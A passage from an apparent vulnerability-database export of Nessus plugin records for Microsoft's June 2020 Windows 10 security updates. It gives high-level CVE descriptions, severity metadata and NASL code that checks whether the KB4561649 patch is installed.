exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561649: Windows 10 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1234", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561649.NASL", "href": "https://www.tenable.com/plugins/nessus/137261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137261);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1234\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561649\");\n script_xref(name:\"MSFT\", value:\"MS20-4561649\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561649: Windows 10 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1334)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561649/windows-10-update-kb4561649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?111cb6a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561649.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561649'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561649])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:55", "description": "The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", 